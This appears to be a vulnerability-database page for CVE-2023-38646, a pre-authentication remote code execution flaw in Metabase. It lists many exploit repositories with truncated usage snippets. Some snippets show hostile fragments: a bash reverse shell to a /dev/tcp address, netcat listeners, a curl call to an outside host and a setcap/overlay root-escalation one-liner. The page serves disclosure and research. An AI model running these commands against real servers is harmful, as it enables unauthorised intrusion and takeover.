Metabase open source prior to 0.46.6.1 and Metabase Enterprise prior to 1.46.6.1 allow malicious users to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
| Vulnerable Product | Search on Vulmon | Subscribe to Product |
|---|---|---|
metabase metabase |
Automatic Tools For Metabase Exploit Known As CVE-2023-38646
CVE-2023-38646 Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646 Read secryme/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork) How to Use singlepy python3 singlepy --url=127001:8080 --command="curl subrequestcatchercom/some-endpoint" or python3 singlepy -u http:/
This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646.
Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646 The system is vulnerable in versions preceding 04661, in the open-source edition, and preceding 14661, in the enterprise edition Usage The script needs the target URL, the setup token
This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646.
Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646 The system is vulnerable in versions preceding 04661, in the open-source edition, and preceding 14661, in the enterprise edition Usage The script needs the target URL, the setup token
CVE-2023-38646 原始脚本来源于securezeron 我在测试过程中发现该poc生成的反向shell在经过base6编码后因为末尾的'='字符导致利用失败。对它稍作修改解决了这个问题。 #原始的生成reverse shell负载的代码 >>> base64b64encode("bash -i >&/dev/tcp/10101459/8080 0>&
免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月22新增 QQ桌面客户端远程执行 禅道180~183 backstage命令注入 联想网盘存在任意文件上传漏洞 企望制造 ERP comboxsto
CVE-2023-38646-exploit "This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication" A quick reverse shell exploit script for cve-2023-38646 I did not find this vulnerability, just made the script Usage root@box:~/CVE-2023-38646# python3 exploitpy _______ ______
CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase
CVE-2023-38646-exploit "This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication" A quick reverse shell exploit script for cve-2023-38646 I did not find this vulnerability, just made the script Usage root@box:~/CVE-2023-38646# python3 exploitpy _______ ______
CVE-2023-38646 Metabase RCE
MetabaseRceTools CVE-2023-38646 Metabase RCE 工具 CVE-2023-38646 RCE 图形化利用工具 验证模块 输入指定网址即可检测未授权Token 命令执行 该模块首先需要执行验证模块获取token才可以使用 JarLocation:metabasejar的位置,默认当前目录 内存马注入 目前仅写了cmd和godzilla模式,通过x-client-data控制 x-clie
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
CVE-2023-38646 - Metabase RCE Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 Usage $ python3 CVE-2023-38646p
Analytics CVE-2023-38646 zhuanlanzhihucom/p/647355511 CVE-2021-3493 githubcom/briskets/CVE-2021-3493
CVE-2023-38646 Metabase 0.46.6 exploit
CVE-2023-38646 CVE-2023-38646 Metabase 0466 exploit This tool exploits a vulnerability (CVE-2023-38646) in a software platform The exploit allows for remote code execution via a crafted request, leveraging a mishandled database connection string Overview The tool: Fetches the setup token from the target URL Base64 encodes the supplied command Constructs the payload with
Metabase postgres (org.h2.Driver) RCE without INIT
Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines) { "token": "TOKEN", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, &q
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
CVE-2023-38646 (Metabase Pre-Auth RCE) Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 Example usage Open two
Metabase postgres (org.h2.Driver) RCE without INIT
Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines) { "token": "TOKEN", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, &q
Metabase Pre-Auth RCE POC
Metabase Pre-Auth RCE POC - CVE-2023-38646 Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server I have written the script directly to gain reverse shell on the attacker's machine Usage The script require the Target URL, Attackers IP and Port Providing the setup token is not required for
exploits CVE-2023-38646 | Metabase Pre-Auth RCE
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
CVE-2023-38646 Metabase Pre-Auth RCE (11/26/2023) Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 The vulnerab
CVE-2023-38646 (Pre-Auth RCE in Metabase)
CVE-2023-38646 Overview Compile Usage Running CVE-2023-38646 Overview Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authenti
Metabase Pre-Auth Remote Code Execution CVE-2023-38646 A proof-of-concept for CVE-2023-38646 Metabase Pre-Auth Remote Code Execution Getting Started Executing program With python3 python3 exploitpy -t metabaseurl/ -l 127001 -p 1337 Help For help menu: python3 exploitpy -h Acknowledgme
Metabase Pre-auth RCE
CVE-2023-38646 - Metabase Pre-auth RCE Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 PoC Steps Navigate t
For educational purposes only
For educational purposes only Inspired by Assetnote research CVE: CVE-2023-38646 CVSS: 98 Vendor link: click Vulnerable version Metabase Enterprise 146 < 14661 Metabase Enterprise 145 < 14541 Metabase Enterprise 144 < 14471 Metabase Enterprise 143 < 14372 Metabase open source 046 < 04661 Metabase open source 045 <
CVE-2023-38646 (Metabase PreAuth RCE) Description Description of the vulnerability What is Metabase: Metabase is an open source business intelligence tool It lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar graph or a detailed table How to run the scanner python scanne
免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月16新增 Smart S85F 任意文件读取 帆软channel序列化 泛微Ecology未授权 泛微Ecology OA 前台任意SQL语句执行 HiKVISION 综合
Metabase Pre-auth RCE (CVE-2023-38646)!!
CVE-2023-38646 Metabase Pre-auth RCE!! Usagse Check Manual Exploitation POC: youtube/b51LPjD-uTo
This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool.
CVE-2023-38646 PoC Description This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the ser
POC for CVE-2023-38646
Metabase Pre Authentication RCE (CVE-2023-38646) We have provided two files:- CVE-2023-38646-POCpy for checking if any metabase intance is leaking setup-token CVE-2023-38646-Reverse-Shellpy to get a reerse shell on the attacker controlled machine CVE-2023-38646-POCpy CVE-2023-38646-Reverse-Shellpy How To Use git clone githubcom/securezeron/CVE-2023-38646
Metabase Pre-auth RCE (CVE-2023-38646)
Metabase Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources It’s a popular project, with over 33k stars on GitHub and has had quite a lot of scrutiny from a vulnerability research perspective in the last few years CVE-2023-38646 - Metabase Pre-auth RCE Metabase open sou
RCE Exploit for CVE-2023-38646
CVE-2023-38646 A python RCE exploit for CVE-2023-38646 Usage Start a Listner nc -lvnp <port> Run the exploit python3 CVE-2023-38646py -u <metabase_url> -l <local_ip> -p <local_port> Help python3 CVE-2023-38646py -h usage: CVE-2023-38646py [-h
Tools to exploit metabase CVE-2023-38646
Poc-Metabase-Preauth-CVE-2023-38646 Ho to use? λ cve git clone githubcom/LazyySec/CVE-2023-38646git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) go build CVE-2023-38646-Exploitgo λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) ✗ go build Reverse-Shellgo λ Poc-Metabase-Preauth
Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)
Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a python script which exploits the remote code execution vulnerability of Metabase's login software It allows us to execute arbitrary commands on the server before authentication Vulnerable versions are Metabase open source before 04661 and Metabase Enterprise before 14661 Usage python3 exploitpy -u URL -t TOKEN -
Proof of Concept for CVE-2023-38646
CVE-2023-38646 Proof of Concept for CVE-2023-38646
cve-2023-38646-metabase-ReverseShell run command go run \CVE-2023-38646-metabase-ReverseShellgo -u targetcom:targetPort -h Your VPS IPaddr -p NC listen Port note when you input the target host , please do not forget the or
CVE-2023-38646 - Metabase Pre-Auth RCE ⚠️ For educational and authorized security research purposes only Original Exploit Authors Very grateful to the original PoC author securezeron Step Guides Set Up the Listener on your attacker machine: nc -nlvp 4444 Then, run this command: python3 CVE-2023-38646-Reverse-Shellpy -h python3
Remote Code Execution on Metabase CVE-2023-38646
🛡️ Exploit for CVE-2023-38646 🛡️ Welcome to this powerful exploit tool! It's designed specifically to test for the CVE-2023-38646 vulnerability in Metabase servers 🚀 Installation 🚀 The journey begins with Python 3 and pip Install them with the following command: sudo apt-get install python3 python3-pip Next, take off
Tools to exploit metabase CVE-2023-38646
Poc-Metabase-Preauth-CVE-2023-38646 Ho to use? λ cve git clone githubcom/LazyySec/CVE-2023-38646git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) go build CVE-2023-38646-Exploitgo λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) ✗ go build Reverse-Shellgo λ Poc-Metabase-Preauth
CVE-2023-38646 Pre-Auth RCE in Metabase
CVE-2023-38646 Fork of kh4sh3i's removing the need for Burp Collector CVE-2023-38646 (Pre-Auth RCE in Metabase): Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation Usage python3 CVE-2023-38646py -u
Analytics-htb-Rce #first clone the repository git clone githubcom/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirementstxt python3 CVE-2023-38646-Reverse-Shellpy -h #the before run reverse shell start netact listeiner and go back to run script as follows python3 CVE-2023-38646-Reverse-Shellpy --rhost {Target Ip address} --lhost {your ip-adress} -
Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection
CVE-2023-38646 Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection The script will GET /api/session/properties to get the setup token and assess exploitability of the target If it's vulnerable will then print the setup token, else it will quit after an error message If the -x option is used and the target is vulnerable, it will use the provide
CVE-2023-38646-Poc usage python checkpy ip port Vulnerable version Metabase Enterprise 146 < 14661 Metabase Enterprise 145 < 14541 Metabase Enterprise 144 < 14471 Metabase Enterprise 143 < 14372 Metabase open source 046 < 04661 Metabase open source 045 < v04541 Metabase open source 044 < 04471 Metabas
Code to detect/exploit vulnerable metabase application
CVE-2023-38646 Code to detect/exploit vulnerable metabase application
alternative method to set up a Collaborator-like server without using Burp Suite premium. Simplified using Python and Flask
Collaborator Server This Collaborator Server is a simple implementation to facilitate out-of-band interaction testing during security assessments It is designed to receive notifications from applications that may be vulnerable to blind vulnerabilities like SQL injection or blind XXE Also used wtih CVE-2023-38646 Metabase exploit Burp Pro alternative install Flask requirement
Metabase Pre-Auth RCE (CVE-2023-38646) PoC A proof of concept of CVE-2023-38646, a Metabase exploit that allows user to do Remote Code Execution utilizing the setup token found in /api/session/properties to send a payload encoded in base64 Usage /MetabaseRCE_CVE-2023-38646 -u [target url] -t [target token] -c [command]
Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection
CVE-2023-38646 Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection The script will GET /api/session/properties to get the setup token and assess exploitability of the target If it's vulnerable will then print the setup token, else it will quit after an error message If the -x option is used and the target is vulnerable, it will use the provide
My solutions for some CTF challenges
CTF Write-ups My solutions for some CTF challenges Challenges # Name of CTF Challenge Category Concepts 1 HTB Uni-CTF 2023 Apethanto FullPwn/Boot2root Metabase CVE-2023-38646 Sudo tokens 2 CakeCTF 2023 bofwow Binary exploitation GOT Overwrite mov ebx, [rbp-8]; add [rbp-0x3d], ebx 3 HTB CACTF 2024 Delulu Binary exploitation Format String Bug
2023 HVV情报速递~
免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月22新增 QQ桌面客户端远程执行 禅道180~183 backstage命令注入 联想网盘存在任意文件上传漏洞 企望制造 ERP comboxsto
Exploit for the Remote Code Execution (RCE) vulnerability identified in Metabase versions before 0.46.6.1 (open source) and 1.46.6.1 (Enterprise). Authentication is not required for exploitation.
Exploit CVE-2023-38646 Metabase before 04661 (open source) and before 14661 (Enterprise) Exploit for the Remote Code Execution (RCE) vulnerability identified in Metabase versions before 04661 (open source) and 14661 (Enterprise) The vulnerability allows attackers to execute arbitrary commands on the server at the server's privilege level, and authentication i
METABASE-RCE-CVE-2023-38646- To get the root user of the machine or system according to the information above, this command and file will get into root user You can run this command directly or run as file and execute Command: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,up
Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646 The system is vulnerable in versions preceding 04661, in the open-source edition, and preceding 14661, in the enterprise edition Usage The script needs the target URL, the setup token
Projet de toolbox
PENTEST TOOLBOX V01 🛠️ Cet outil a été conçu pour faciliter les tests de pénétration en automatisant certaines tâches courantes et en fournissant une interface conviviale pour l'exploitation des vulnérabilités Installation ⚙️ Clonez ce dépôt sur votre machine locale : git clone githubco
Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.
Vulmon